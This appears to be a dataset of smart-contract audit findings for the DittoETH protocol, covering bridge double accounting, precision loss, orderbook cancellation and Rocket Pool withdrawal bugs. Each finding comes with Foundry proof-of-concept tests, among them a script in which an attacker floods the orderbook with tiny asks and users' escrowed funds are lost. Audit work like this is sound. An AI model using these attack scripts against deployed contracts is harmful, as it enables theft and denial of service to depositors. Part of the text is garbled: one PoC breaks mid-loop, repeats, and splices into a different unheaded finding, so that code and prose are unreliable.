s.vaultBridges[vault];\\n uint256 bridgeCount = bridges.length;\\n\\n for (uint256 i; i < bridgeCount;) {\\n zethTotal += IBridge(bridges[i]).getZethValue(); \\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nTo demonstrate this behavior, a simple Proof of Concept (PoC) was created. 
(The test was placed in the Yield.t.sol file.)\\n```\\nfunction test_double_bridge_push() public {\\n vm.prank(owner);\\n diamond.createBridge(_bridgeReth, Vault.CARBON, 0, 0);\\n diamond.getUndistributedYield(Vault.CARBON); \\n assert(diamond.getUndistributedYield(Vault.CARBON) > 0); // As no yield was generated, this should not be true, but in current situation, it is a proof of double accounting.\\n}\\n```\\nчNo check if bridge already exists\\nTo address this vulnerability, it is recommended to add the following mitigation to the createBridge function:\\n```\\n// rest of code\\n// Add the line below\\n for (uint i = 0; i < s.vaultBridges[vault].length; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n if (s.vaultBridges[vault][i] == bridge) {\\n// Add the line below\\n revert Errors.BridgeAlreadyExist();\\n// Add the line below\\n }\\n// Add the line below\\n }\\n```\\n\\nThis change will prevent the inadvertent creation of duplicate bridges and mitigate the risk of double accounting of yield.чIn specific circumstances, if a DAO proposal is confirmed, it could inadvertently trigger the creation of a bridge with the same address for a vault that already uses it. This scenario can lead to double accounting of yield and, as a consequence, potentially expose the protocol to vulnerabilities such as Denial of Service and yield theft.\\nHowever, it's important to note that the likelihood of this issue occurring is relatively low, and the function is governed by the DAO. 
After discussing this with the sponsor, we have classified this finding as low severity.ч```\\nfunction getZethTotal(uint256 vault) internal view returns (uint256 zethTotal) {\\n AppStorage storage s = appStorage();\\n address[] storage bridges = s.vaultBridges[vault];\\n uint256 bridgeCount = bridges.length;\\n\\n for (uint256 i; i < bridgeCount;) {\\n zethTotal += IBridge(bridges[i]).getZethValue(); \\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n -Loss of precision in `twapPriceInEther` due to division before multiplicationчlowчWhen calculating `twapPriceInEther`, `twapPrice` is divided by 1e6 before multiplication with 1e18 is done.\\n```\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n \\n // more code\\n\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L64-L85\\nAccording to the above calculation, the `twapPrice` obtained would be precise upto 6 decimal places. 
Performing division before multiplying with 1e18 will result in loss of this precision and.\\nExample Scenario\\n```\\ntwapPrice = 1902501929\\ntwapPriceInEther = 1902000000000000000000\\n\\n// if multiplication is performed earlier,\\ntwapPriceInEther = 1902501929000000000000\\n```\\nчPerform the multiplication before division.\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/libraries/LibOracle.sol b/contracts/libraries/LibOracle.sol\\nindex 23d1d0a..6962ad7 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/libraries/LibOracle.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/libraries/LibOracle.sol\\n@@ // Remove the line below\\n82,7 // Add the line below\\n82,7 @@ library LibOracle {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n// Remove the line below\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n// Add the line below\\n uint256 twapPriceInEther = (twapPrice * 1 ether) / Constants.DECIMAL_USDC;\\n uint256 twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice();\\n```\\nчPrice used can have -1 (in 18 decimals) difference from the original price.ч```\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n \\n // more code\\n\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n```\\n -`onERC721Received()` callback is never called when new tokens are minted in Erc721Facet.solчlowчThe ERC721Facet contract does not 
properly call the corresponding callback when new tokens are minted. The ERC721 standard states that the onERC721Received callback must be called when a mint or transfer operation occurs. However, the smart contracts interacting as users with `Erc721Facet.mintNFT()` will not be notified with the onERC721Received callback, as expected according to the ERC721 standard.\\n`onErc721Received()` isn't called on minting:\\n```\\n function mintNFT(address asset, uint8 shortRecordId)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, shortRecordId)\\n {\\n if (shortRecordId == Constants.SHORT_MAX_ID) {\\n revert Errors.CannotMintLastShortRecord();\\n }\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][msg.sender][shortRecordId];\\n\\n if (short.tokenId != 0) revert Errors.AlreadyMinted();\\n\\n s.nftMapping[s.tokenIdCounter] = STypes.NFT({\\n owner: msg.sender,\\n assetId: s.asset[asset].assetId,\\n shortRecordId: shortRecordId\\n });\\n\\n short.tokenId = s.tokenIdCounter;\\n\\n //@dev never decreases\\n s.tokenIdCounter += 1;\\n }\\n```\\nчCall `onErc721Received()`чIt can create interoperability issues with users' contractsч```\\n function mintNFT(address asset, uint8 shortRecordId)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, shortRecordId)\\n {\\n if (shortRecordId == Constants.SHORT_MAX_ID) {\\n revert Errors.CannotMintLastShortRecord();\\n }\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][msg.sender][shortRecordId];\\n\\n if (short.tokenId != 0) revert Errors.AlreadyMinted();\\n\\n s.nftMapping[s.tokenIdCounter] = STypes.NFT({\\n owner: msg.sender,\\n assetId: s.asset[asset].assetId,\\n shortRecordId: shortRecordId\\n });\\n\\n short.tokenId = s.tokenIdCounter;\\n\\n //@dev never decreases\\n s.tokenIdCounter += 1;\\n }\\n```\\n -[L-4] Yield update will not happen at the 1k ETH thresholdчlowчYield updates happen for a vault when the 
`BRIDGE_YIELD_UPDATE_THRESHOLD` is met for the vault after a large bridge deposit. The `maybeUpdateYield` function handles this logic for updates when that happens (1000 ETH to be exact).\\nThreshold constant from:\\n```\\nFILE: 2023-09-ditto/contracts/libraries/Constants.sol\\n\\nLine 17:\\nuint256 internal constant BRIDGE_YIELD_UPDATE_THRESHOLD = 1000 ether;\\n\\nLine 18:\\nuint256 internal constant BRIDGE_YIELD_PERCENT_THRESHOLD = 0.01 ether; // 1%\\n```\\n\\n```\\nFILE: 2023-09-ditto/contracts/facets/BridgeRouterFacet.sol\\n\\nfunction maybeUpdateYield(uint256 vault, uint88 amount) private {\\n uint88 zethTotal = s.vault[vault].zethTotal;\\n if (\\n zethTotal > Constants.BRIDGE_YIELD_UPDATE_THRESHOLD\\n && amount.div(zethTotal) > Constants.BRIDGE_YIELD_PERCENT_THRESHOLD\\n ) { // @audit should be >= to account for when threshold is met\\n // Update yield for \"large\" bridge deposits\\n vault.updateYield();\\n }\\n }\\n```\\nчChange the `>` operand in the `maybeUpdateYield` function to be `>=`.чIn reality the yield update for the vault will not happen in the instances of 1000 ETH deposits unless the bridge deposit amount into the vault is > 1000 ETH and the percent is greater than 1%.ч```\\nFILE: 2023-09-ditto/contracts/libraries/Constants.sol\\n\\nLine 17:\\nuint256 internal constant BRIDGE_YIELD_UPDATE_THRESHOLD = 1000 ether;\\n\\nLine 18:\\nuint256 internal constant BRIDGE_YIELD_PERCENT_THRESHOLD = 0.01 ether; // 1%\\n```\\n -If the dao removes a bridge, user's deposited tokens for that bridge will be lost.чlowчIf the dao removes a bridge for any (non-malicious) reason, user's deposited tokens for that bridge will be lost.\\nIn the `OwnerFacet.sol` the dao of the system has the option to remove a bridge by calling the `deleteBridge()` function. There is no check if there are any assets in the bridge. 
Also users may deposit funds in the bridge during the voting period.\\nPOC Add the following function in the `BridgeRouter.t.sol`\\n```\\nfunction test_DeleteBridgeWithAssets() public {\\n console.log(\"Sender ethEscrowed in vault 2 before deposit: \", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n deal(_rethA, sender, 10000 ether);\\n\\n vm.startPrank(sender);\\n uint88 deposit1 = 1000 ether;\\n uint88 withdrawAmount = 100 ether;\\n diamond.deposit(_bridgeRethToBeDeleted, deposit1);\\n console.log(\"Sender ethEscrowed in vault2 after deposit: \", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log(\"Sender ethEscrowed after withdraw: \", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n vm.stopPrank();\\n\\n console.log(\"Balance of reth in the bridgeRethToBeDeleted: \", rethA.balanceOf(_bridgeRethToBeDeleted));\\n\\n /// INFO: DAO deletes the bridge after a vote has been passed\\n vm.startPrank(owner) ;\\n diamond.deleteBridge(_bridgeRethToBeDeleted);\\n vm.stopPrank();\\n\\n vm.startPrank(sender);\\n vm.expectRevert();\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log(\"Balance of reth in the bridgeRethToBeDeleted: \", rethA.balanceOf(_bridgeRethToBeDeleted));\\n vm.stopPrank();\\n }\\n```\\n\\nIn order to run this test, you also have to add\\n```\\n rethA.approve(\\n _bridgeRethToBeDeleted,\\n 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\\n );\\n```\\n\\nto `setUp()` function of the `BridgeROuter.t.sol` contract\\nIn `DeployHelper.sol` another bridge and vault have to be added in order for the test to run:\\n```\\n/// INFO: added by auditor\\n IBridge public bridgeRethToBeDeleted;\\n address public _bridgeRethToBeDeleted;\\n IAsset public zethToBeDeletedVault;\\n address public _zethToBeDeletedVault;\\n IRocketStorage public rocketStorageA;\\n address public _rocketStorageA;\\n IRocketTokenRETH public rethA;\\n address public 
_rethA;\\n```\\n\\nAdd the following to `deployContracts()` function\\n```\\nif (chainId == 31337) {\\n //mocks\\n _immutableCreate2Factory = deployCode(\"ImmutableCreate2Factory.sol\");\\n\\n if (isMock) {\\n _steth = deployCode(\"STETH.sol\");\\n _unsteth = deployCode(\"UNSTETH.sol\", abi.encode(_steth));\\n _rocketStorage = deployCode(\"RocketStorage.sol\");\\n _reth = deployCode(\"RocketTokenRETH.sol\");\\n reth = IRocketTokenRETH(_reth);\\n _ethAggregator = deployCode(\"MockAggregatorV3.sol\");\\n /// INFO: added by auditor\\n _rocketStorageA = deployCode(\"RocketStorage.sol\");\\n _rethA = deployCode(\"RocketTokenRETH.sol\");\\n rethA = IRocketTokenRETH(_rethA);\\n }\\n\\n rocketStorage = IRocketStorage(_rocketStorage);\\n /// INFO: added by auditor\\n rocketStorageA = IRocketStorage(_rocketStorageA);\\n steth = ISTETH(_steth);\\n unsteth = IUNSTETH(payable(_unsteth));\\n ethAggregator = IMockAggregatorV3(_ethAggregator);\\n }\\n\\n/// INFO: Added by auditor \\n _zethToBeDeletedVault = factory.safeCreate2(\\n salt,\\n abi.encodePacked(\\n vm.getCode(\"Asset.sol:Asset\"), abi.encode(_diamond, \"Zebra ETH Two\", \"ZETHT\")\\n )\\n );\\n\\n _bridgeRethToBeDeleted = factory.safeCreate2(\\n salt,\\n abi.encodePacked(\\n vm.getCode(\"BridgeReth.sol:BridgeReth\"),\\n abi.encode(_rocketStorageA, _diamond)\\n )\\n );\\n\\n bridgeRethToBeDeleted = IBridge(_bridgeRethToBeDeleted);\\n MTypes.CreateVaultParams memory vaultParams;\\n vaultParams.zethTithePercent = 10_00;\\n vaultParams.dittoMatchedRate = 1;\\n vaultParams.dittoShorterRate = 1;\\n diamond.createVault({zeth: _zeth, vault: Vault.CARBON, params: vaultParams});\\n\\n MTypes.CreateVaultParams memory vaultParamsTwo;\\n vaultParamsTwo.zethTithePercent = 9_00;\\n vaultParamsTwo.dittoMatchedRate = 1;\\n vaultParamsTwo.dittoShorterRate = 1;\\n zethToBeDeletedVault = IAsset(_zethToBeDeletedVault);\\n diamond.createVault({zeth: _zethToBeDeletedVault, vault: 2, params: vaultParamsTwo});\\n STypes.Vault memory 
carbonVaultConfigTwo = diamond.getVaultStruct(2);\\n assertEq(carbonVaultConfigTwo.zethTithePercent, 9_00);\\n\\n diamond.createBridge({\\n bridge: _bridgeRethToBeDeleted,\\n vault: 2,\\n withdrawalFee: 150,\\n unstakeFee: 0\\n });\\n \\n if (isMock) {\\n rocketStorage.setDeposit(_reth);\\n rocketStorage.setReth(_reth);\\n /// INFO: added by auditor\\n rocketStorageA.setDeposit(_rethA);\\n rocketStorageA.setReth(_rethA);\\n _setETH(4000 ether);\\n }\\n```\\n\\nTo run the test use `forge test -vvv --mt test_DeleteBridgeWithAsset`чIn `deleteBridge()` make sure that the contract doesn't have any assetsчUser's deposited `RETH` or `STETH` in that bridge will be lost, as the user doesn't have the option to withdraw them. Because the withdraw functions can only be called trough the `Diamond.sol`ч```\\nfunction test_DeleteBridgeWithAssets() public {\\n console.log(\"Sender ethEscrowed in vault 2 before deposit: \", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n deal(_rethA, sender, 10000 ether);\\n\\n vm.startPrank(sender);\\n uint88 deposit1 = 1000 ether;\\n uint88 withdrawAmount = 100 ether;\\n diamond.deposit(_bridgeRethToBeDeleted, deposit1);\\n console.log(\"Sender ethEscrowed in vault2 after deposit: \", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log(\"Sender ethEscrowed after withdraw: \", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n vm.stopPrank();\\n\\n console.log(\"Balance of reth in the bridgeRethToBeDeleted: \", rethA.balanceOf(_bridgeRethToBeDeleted));\\n\\n /// INFO: DAO deletes the bridge after a vote has been passed\\n vm.startPrank(owner) ;\\n diamond.deleteBridge(_bridgeRethToBeDeleted);\\n vm.stopPrank();\\n\\n vm.startPrank(sender);\\n vm.expectRevert();\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log(\"Balance of reth in the bridgeRethToBeDeleted: \", rethA.balanceOf(_bridgeRethToBeDeleted));\\n vm.stopPrank();\\n }\\n```\\n 
-Users Lose Funds and Market Functionality Breaks When Market Reaches 65k Idчhighчif the orderbook of any market reaches 65,000, the DAO can call the function cancelOrderFarFromOracle multiple times to cancel many orders, up to 1000 orders in each transaction, or anyone can cancel the last order in one call. The users who issued the cancelled orders will lose their deposits, and the cancellation process is not limited to a certain number of orders.\\nsource : contracts/facets/OrderFacet.sol\\nFunction : cancelOrderFarFromOracle\\nwhenever a user creates a limit order (short limit,bid limit,ask limit), if the order did not match it gets added to the orderbook, and the `assets amount` or `eth amount` used to create this order is taken from the Virtual balance of the user in the system.\\nuserVault(in case of `bids` and shorts) or userAsset(in case of asks) we can see that here :\\n` // for asks:\\n s.assetUser[asset][order.addr].ercEscrowed -= order.ercAmount;\\n // for `shorts` :\\n s.vaultUser[vault][order.addr].ethEscrowed -= eth;\\n //for `bids` :\\n s.vaultUser[vault][order.addr].ethEscrowed -= eth;`\\nalso if there are no ids recycled behind the Head, the id for these orders is going to be the current id in s.asset[asset].orderId, and the `s.asset[asset].orderId` gets incremented by one. This is true for all three types of orders. (shorts,asks,bids).\\nnow in case this ordersId reaches 65k for a specific market, the DAO is able to cancel the last 1000 orders, and anyone can cancel the last order in one call.
since it's only checks for the ordersId > 65000.and by the last order i mean the last order of any time of limit orders (asks,shorts,bids).\\n`function cancelOrderFarFromOracle(address asset, O orderType, uint16 lastOrderId, uint16 numOrdersToCancel)\\n external\\n onlyValidAsset(asset)\\n nonReentrant\\n{\\n if (s.asset[asset].orderId < 65000) {\\n revert Errors.OrderIdCountTooLow();\\n }\\n\\n if (numOrdersToCancel > 1000) {\\n revert Errors.CannotCancelMoreThan1000Orders();\\n }\\n\\n if (msg.sender == LibDiamond.diamondStorage().contractOwner) {\\n if (orderType == O.LimitBid && s.bids[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.bids.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n } else if (orderType == O.LimitAsk && s.asks[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.asks.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n } else if (orderType == O.LimitShort && s.shorts[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.shorts.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n } else {\\n revert Errors.NotLastOrder();\\n }\\n } else {\\n //@dev if address is not DAO, you can only cancel last order of a side\\n if (orderType == O.LimitBid && s.bids[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.bids.cancelOrder(asset, lastOrderId);\\n } else if (orderType == O.LimitAsk && s.asks[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.asks.cancelOrder(asset, lastOrderId);\\n } else if (orderType == O.LimitShort && s.shorts[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.shorts.cancelOrder(asset, lastOrderId);\\n } else {\\n revert Errors.NotLastOrder();\\n }\\n }\\n}\\n... 
....\\n// cancle many orders no extra checks :\\nfunction cancelManyOrders(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n uint16 lastOrderId,\\n uint16 numOrdersToCancel\\n ) internal {\\n uint16 prevId;\\n uint16 currentId = lastOrderId;\\n for (uint8 i; i < numOrdersToCancel;) {\\n prevId = orders[asset][currentId].prevId;\\n LibOrders.cancelOrder(orders, asset, currentId);\\n currentId = prevId;\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n...... .....\\n// no extrac checks in cancleOrder() function also. it set the order to Cancelled , remove it from the list, and Set it to be reused:\\nfunction cancelOrder(mapping(address => mapping(uint16 => STypes.Order)) storage orders, address asset, uint16 id)\\n internal\\n {\\n uint16 prevHEAD = orders[asset][Constants.HEAD].prevId;\\n\\n // remove the links of ID in the market\\n // @dev (ID) is exiting, [ID] is inserted\\n // BEFORE: PREV <-> (ID) <-> NEXT\\n // AFTER : PREV <----------> NEXT\\n orders[asset][orders[asset][id].nextId].prevId = orders[asset][id].prevId;\\n orders[asset][orders[asset][id].prevId].nextId = orders[asset][id].nextId;\\n\\n // create the links using the other side of the HEAD\\n emit Events.CancelOrder(asset, id, orders[asset][id].orderType);\\n _reuseOrderIds(orders, asset, id, prevHEAD, O.Cancelled);\\n}`\\nas we said the user balance get decreaced by the `value` of it's order he created. but since the order is set to cancelled the user never gonna be able to recieve thier amount back.cause cancelled orders can't be matched Neither cancelled again.\\nEx:\\na user create a limit bid as follow : {price: 0.0001 ether, amount: 10000 ether}.\\nwhen this order get cancelled : the user will loose : 0.0001 * 10000 = `1 ether` ZETH (or ETH)\\nthe shorters will lose more then others since thier balance get decreaced by : PRICE * AMOUNT * MARGIN.\\nThe second issue is there is no limit for how many orders can be cancelled. 
you can cancel the whole orders in a market that reaches 65K `orderId`. `limits shorts` ,limits `asks` or `limit bids` .starting from the last one.since the only Conditionto be able to cancel orders is the asset order ID reached this number. and if it reachs it. it never decrease .even if there is alot of orders behind head(non active) to be reused.\\na malicious actor Can targeted this vulnerability by creating numerous tiny limit `asks` pushing the `orderId` to be too high .and he can do so by creating `ask` with a very high price and very small amount so he can pass the `MinEth` amount check, he can just with less then `1 cusd` (in case of cusd market) create a bunsh of limit `asks` orders .\\nPOC :\\nusing the the main repo setup for testing , here a poc shows how a malicious user can fill the orderbook with bunsh of tiny `limit asks` with little cost. and how you can cancle all orders in case the orderId reachs 65k. also that there is no refund for the users that created this orders.\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {Errors} from \"contracts/libraries/Errors.sol\";\\nimport {Events} from \"contracts/libraries/Events.sol\";\\nimport {STypes, MTypes, O} from \"contracts/libraries/DataTypes.sol\";\\nimport {Constants} from \"contracts/libraries/Constants.sol\";\\nimport \"forge-std/console.sol\";\\nimport {OBFixture} from \"test/utils/OBFixture.sol\";\\n// import {console} from \"contracts/libraries/console.sol\";\\n\\ncontract POC is OBFixture {\\n address[3] private bidders = [address(435433), address(423432523), address(522366)];\\n address[3] private shorters = [address(243422243242), address(52353646324532), address(40099)];\\n address attacker = address(3234);\\n function setUp() public override {\\n super.setUp();\\n }\\n\\n // an attacker can fill the order book with a bunsh of asks that have too high price and low asset \\n function test_fillWithAsks() public {\\n // create a bunsh of asks with a high 
price :\\n depositUsd(attacker, DEFAULT_AMOUNT * 10000);\\n uint balanceAssetBefore = diamond.getAssetBalance(asset,attacker);\\n // minAsk = 0.0001 ether . 0.0001 ether = x * 1 , x =0.0001 ether * 1 ether\\n vm.startPrank(attacker);\\n for (uint i ; i< 1000 ;i++){\\n createLimitAsk( 10**24, 10**10); \\n }\\n vm.stopPrank();\\n STypes.Order[] memory asks = diamond.getAsks(asset);\\n console.log(\"tiny asks created : \", asks.length);\\n console.log( \"hack cost asset\", balanceAssetBefore - diamond.getAssetBalance(asset,attacker));\\n\\n }\\n function test_cancleOrders() public {\\n //set the assetid to 60000;\\n diamond.setOrderIdT(asset,64998);\\n // create multiple bids and 1 shorts\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, bidders[0]); // id 64998\\n fundLimitShortOpt(uint80(DEFAULT_PRICE)*4, DEFAULT_AMOUNT, shorters[0]); //id 64999\\n fundLimitBidOpt(DEFAULT_PRICE*2, DEFAULT_AMOUNT, bidders[1]); // id 65000\\n fundLimitBidOpt(DEFAULT_PRICE*3 , DEFAULT_AMOUNT, bidders[2]); //id 65001\\n /* now we have the lists like this :\\n - for bids : Head <- Head <->65001<->65000<->64998->Tail\\n - for shorts: Head <- Head <->64999->Tail\\n */\\n\\n //lets cancle the all the bids :\\n canclebid(64998);\\n // - now : Head <-64998<-> Head <->65001<->65000->Tail\\n uint s1 = vm.snapshot();\\n vm.revertTo(s1);\\n canclebid(65000);\\n // - now : Head <-64998<->65000<-> Head <->65001->Tail\\n uint s2 = vm.snapshot();\\n vm.revertTo(s2);\\n canclebid(65001);\\n // - now : Head <-64998<->65000<->65001<-> Head ->Tail\\n // let's check the active bids :\\n STypes.Order[] memory Afterbids = diamond.getBids(asset);\\n // notice that we were able to delete all the bids even there was unActive ID's to be reused.\\n assertTrue(Afterbids.length == 0);\\n // also notice that the owners of this orders did not get refund thier zeth back that have been taken from them when they create this orders.\\n\\n for (uint i; i65001<->65000<->64998->Tail\\n - for shorts: Head <- Head 
<->64999->Tail\\n */\\n\\n //lets cancle the all the bids :\\n canclebid(64998);\\n // - now : Head <-64998<-> Head <->65001<->65000->Tail\\n uint s1 = vm.snapshot();\\n vm.revertTo(s1);\\n canclebid(65000);\\n // - now : Head <-64998<->65000<-> Head <->65001->Tail\\n uint s2 = vm.snapshot();\\n vm.revertTo(s2);\\n canclebid(65001);\\n // - now : Head <-64998<->65000<->65001<-> Head ->Tail\\n // let's check the active bids :\\n STypes.Order[] memory Afterbids = diamond.getBids(asset);\\n // notice that we were able to delete all the bids even there was unActive ID's to be reused.\\n assertTrue(Afterbids.length == 0);\\n // also notice that the owners of this orders did not get refund thier zeth back that have been taken from them when they create this orders.\\n\\n for (uint i; i 0) {\\n // Ensure enough blocks have passed\\n uint256 depositDelay = getUint(keccak256(abi.encodePacked(keccak256(\"dao.protocol.setting.network\"), \"network.reth.deposit.delay\")));\\n uint256 blocksPassed = block.number.sub(lastDepositBlock);\\n require(blocksPassed > depositDelay, \"Not enough time has passed since deposit\");\\n // Clear the state as it's no longer necessary to check this until another deposit is made\\n deleteUint(key);\\n }\\n }\\n }\\n```\\n\\nAny future changes made to this delay by the admins could potentially lead to a denial-of-service attack on the `BridgeRouterFacet::deposit` and `BridgeRouterFacet::withdraw` mechanism for the rETH bridge.чPossible DOS on deposit(), withdraw() and unstake() for BridgeReth, leading to user loss of funds\\nConsider modifying Reth bridge to obtain rETH only through the UniswapV3 pool, on average users will get less rETH due to the slippage, but will avoid any future issues with the deposit delay mechanism.чCurrently, the delay is set to zero, but if RocketPool admins decide to change this value in the future, it could cause issues. 
Specifically, protocol users' staking actions could prevent other users from unstaking for a few hours. Given that many users call the stake function throughout the day, the delay would constantly reset, making the unstaking mechanism unusable. It's important to note that this only occurs when stake() is used through the rocketDepositPool route. If rETH is obtained from the Uniswap pool, the delay is not affected.\\nAll the ETH swapped for rETH calling `BridgeReth::depositEth` would become irrecoverable, leading to a user bank run on DittoETH to avoid being harmed by this protocol loss being externalized to all the users that have deposited.ч```\\n // This is called by the base ERC20 contract before all transfer, mint, and burns\\n function _beforeTokenTransfer(address from, address, uint256) internal override {\\n // Don't run check if this is a mint transaction\\n if (from != address(0)) {\\n // Check which block the user's last deposit was\\n bytes32 key = keccak256(abi.encodePacked(\"user.deposit.block\", from));\\n uint256 lastDepositBlock = getUint(key);\\n if (lastDepositBlock > 0) {\\n // Ensure enough blocks have passed\\n uint256 depositDelay = getUint(keccak256(abi.encodePacked(keccak256(\"dao.protocol.setting.network\"), \"network.reth.deposit.delay\")));\\n uint256 blocksPassed = block.number.sub(lastDepositBlock);\\n require(blocksPassed > depositDelay, \"Not enough time has passed since deposit\");\\n // Clear the state as it's no longer necessary to check this until another deposit is made\\n deleteUint(key);\\n }\\n }\\n }\\n```\\n -ETH cannot always be unstaked using Rocket PoolчlowчThe protocol lets users unstake Ethereum using any bridge they want. Rocket Pool may not have enough ETH to satisfy unstake transactions, which will cause the transaction to revert.\\nWhen users try to unstake ETH using Rocket Pool, the transaction may revert because Rocket Pool may not have enough ETH in its deposit pool and rEth contract to satisfy the unstake request. 
Rocket pool sources ETH for unstaking from the rEth contract and deposit pool. When they are empty it cannot satisfy unstake requests. More information can be found in the Unstake section of the rocketPool documentation.\\nThe pools have been empty before. Here's a proof of concept of failed withdrawals when Rocket Pool's rEth contract and deposit pool were empty at block 15361748.\\n```\\n function testWithdrawETHfromRocketPool() public{\\n string memory MAINNET_RPC_URL = vm.envString(\"MAINNET_RPC_URL\");\\n uint256 mainnetFork = vm.createFork(MAINNET_RPC_URL, 15361748);\\n\\n RocketTokenRETHInterface rEth = RocketTokenRETHInterface(0xae78736Cd615f374D3085123A210448E74Fc6393);\\n vm.selectFork(mainnetFork);\\n uint totalCollateral = rEth.getTotalCollateral();\\n assertEq(totalCollateral, 0); // pools are empty\\n\\n address owner = 0x50A78DFb9F5CC22ac8ffA90FA2B6C595881CCb97; // has rEth at block 15361748\\n uint rEthBalance = rEth.balanceOf(owner);\\n assertGt(rEthBalance, 0);\\n \\n vm.expectRevert(\"Insufficient ETH balance for exchange\");\\n vm.prank(owner); \\n rEth.burn(rEthBalance);\\n }\\n```\\nчCheck if Rocket Pool has enough ETH and if it doesn't, rEth can be exchanged for ETH on a DEX and sent to the user.чIf Rocket Pool's rEth contract and deposit Pool do not have enough ETH to satisfy an unstake transaction the transaction will revert.ч```\\n function testWithdrawETHfromRocketPool() public{\\n string memory MAINNET_RPC_URL = vm.envString(\"MAINNET_RPC_URL\");\\n uint256 mainnetFork = vm.createFork(MAINNET_RPC_URL, 15361748);\\n\\n RocketTokenRETHInterface rEth = RocketTokenRETHInterface(0xae78736Cd615f374D3085123A210448E74Fc6393);\\n vm.selectFork(mainnetFork);\\n uint totalCollateral = rEth.getTotalCollateral();\\n assertEq(totalCollateral, 0); // pools are empty\\n\\n address owner = 0x50A78DFb9F5CC22ac8ffA90FA2B6C595881CCb97; // has rEth at block 15361748\\n uint rEthBalance = rEth.balanceOf(owner);\\n assertGt(rEthBalance, 0);\\n \\n 
vm.expectRevert(\"Insufficient ETH balance for exchange\");\\n vm.prank(owner); \\n rEth.burn(rEthBalance);\\n }\\n```\\n -Users can avoid liquidation while being under the primary liquidation ratio if on the last short recordчhighчThe protocol permits users to maintain up to 254 concurrent short records. When this limit is reached, any additional orders are appended to the final position, rather than creating a new one. A short record is subject to flagging if it breaches the primary liquidation ratio set by the protocol, leading to potential liquidation if it remains below the threshold for a predefined period.\\nThe vulnerability emerges from the dependency of liquidation times on the `updatedAt` value of shorts. For the last short record, the appending of any new orders provides an alternative pathway for updating the `updatedAt` value of shorts, enabling users to circumvent liquidation by submitting minimal shorts to block liquidation by adjusting the time difference, thus avoiding liquidation even when they do not meet the collateral requirements for a healthy state.\\nlets take a look at the code to see how this works.\\nFlagging of Short Record:\\nThe `flagShort` function allows a short to be flagged if it's under `primaryLiquidationCR`, subsequently invoking `setFlagger` which updates the short's `updatedAt` timestamp to the current time.\\n```\\nfunction flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n {\\n // initial code\\n\\n short.setFlagger(cusd, flaggerHint);\\n emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n }\\n```\\n\\nLiquidation Eligibility Check:\\nThe `_canLiquidate` function assesses whether the flagged short is still under `primaryLiquidationCR` after a certain period and if it's eligible for liquidation, depending on the `updatedAt` timestamp and various liquidation time 
